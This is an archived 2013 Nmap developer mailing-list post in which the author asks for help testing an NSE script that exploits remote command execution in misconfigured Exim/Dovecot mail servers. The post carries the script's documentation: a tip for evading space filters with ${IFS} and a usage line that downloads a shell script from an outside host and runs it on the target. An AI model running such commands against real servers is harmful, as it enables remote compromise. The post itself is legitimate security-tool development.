Nmap Development mailing list archives

[NSE] Exim w/ Dovecot Remote Command Execution vulnerability

From: Paulino Calderon <paulino () calderonpale com>
Date: Sun, 05 May 2013 10:16:36 -0500

Hi list,

Can I get some help testing this?

description = [[

Attempts to exploit a remote command execution vulnerability inmisconfigured Dovecot/Exim mail servers.

It is important to note that the mail server will not return the outputof the command. The mail serveralso wont allow space characters but they can be replaced with "${IFS}".Commands can also beconcatenated with "``". The script takes care of the conversionautomatically when setting the argument "cmd".


References:

*https://www.redteam-pentesting.de/en/advisories/rt-sa-2013-001/-exim-with-dovecot-typical-misconfiguration-leads-to-remote-command-execution*http://immunityproducts.blogspot.mx/2013/05/how-common-is-common-exim-and-dovecot.html

* CVE not available yet
]]

---

-- @usage nmap -sV --script smtp-dovecot-exim-exec --script-argssmtp-dovecot-exim-exec.cmd="uname -a" <target>-- @usage nmap -p586 --script smtp-dovecot-exim-exec --script-argssmtp-dovecot-exim-exec.cmd="wget -O /tmp/p example.com/test.sh;bash/tmp/p" <target>

--
-- @output
-- PORT    STATE SERVICE REASON
-- 465/tcp open  smtps   syn-ack
-- |_smtp-dovecot-exim-exec: Malicious payload delivered:250 OK id=XXX
--

-- @args smtp-dovecot-exim-exec.cmd Command to execute. Separatecommands with ";".

-- @args smtp-dovecot-exim-exec.auth Authentication scheme (Optional).
-- @args smtp-dovecot-exim-exec.user Authentication username (Optional).
-- @args smtp-dovecot-exim-exec.pwd Authentication password (Optional).

-- @args smtp-dovecot-exim-exec.from Email address to use in the FROMfield. Default: nmap+domain. (Optional).-- @args smtp-dovecot-exim-exec.to Email address to use in the TO field.Default: nmap () mailinator com-- @args smtp-dovecot-exim-exec.timeout Timeout value. Default: 8000.(Optional)-- @args smtp-dovecot-exim-exec.domain Domain name to use. It attemptsto set this field automatically. (Optional)

---

Attachment: smtp-dovecot-exim-exec.nse
Description:

_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/

Current thread:

[NSE] Exim w/ Dovecot Remote Command Execution vulnerability Paulino Calderon (May 05)
- Re: [NSE] Exim w/ Dovecot Remote Command Execution vulnerability David Fifield (May 06)